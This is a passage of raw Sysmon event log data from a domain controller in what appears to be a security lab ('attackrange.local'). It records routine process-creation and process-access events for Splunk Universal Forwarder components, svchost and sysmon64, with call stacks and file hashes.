Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004497Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:45.347{59A5CD1D-8F65-6005-F400-00000000A301}2844C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004523Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004522Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004521Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004520Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004519Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004518Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004517Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004516Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004515Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004514Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004513Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004512Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000004511Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:46.019{59A5CD1D-8F66-6005-F500-00000000A301}4860C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000004537Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.456{59A5CD1D-8F67-6005-F600-00000000A301}48484840C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004536Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004535Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004534Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004533Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004532Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004531Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004530Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004529Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004528Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004527Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E46-6005-0C00-00000000A301}5961112C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000004526Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000004525Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:38:47.316{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-8F67-6005-F600-00000000A301}4848C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program 